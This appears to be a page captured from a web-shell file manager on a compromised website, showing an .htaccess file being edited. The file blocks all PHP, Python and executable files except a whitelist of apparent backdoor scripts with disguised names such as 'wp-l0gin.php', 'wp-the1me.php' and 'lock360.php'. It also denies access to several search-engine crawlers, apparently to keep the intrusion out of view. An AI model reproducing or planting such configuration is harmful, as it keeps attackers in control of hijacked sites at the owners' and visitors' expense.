OwlCyberSecurity - MANAGER
Edit File: htaccess
<FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^PetalBot [OR] RewriteCond %{HTTP_USER_AGENT} ^nbot [OR] RewriteCond %{HTTP_USER_AGENT} ^SemrushBot [OR] RewriteCond %{HTTP_USER_AGENT} ^AhrefsBot [OR] RewriteCond %{HTTP_USER_AGENT} ^MJ12bot RewriteRule ^.* - [F,L] </IfModule>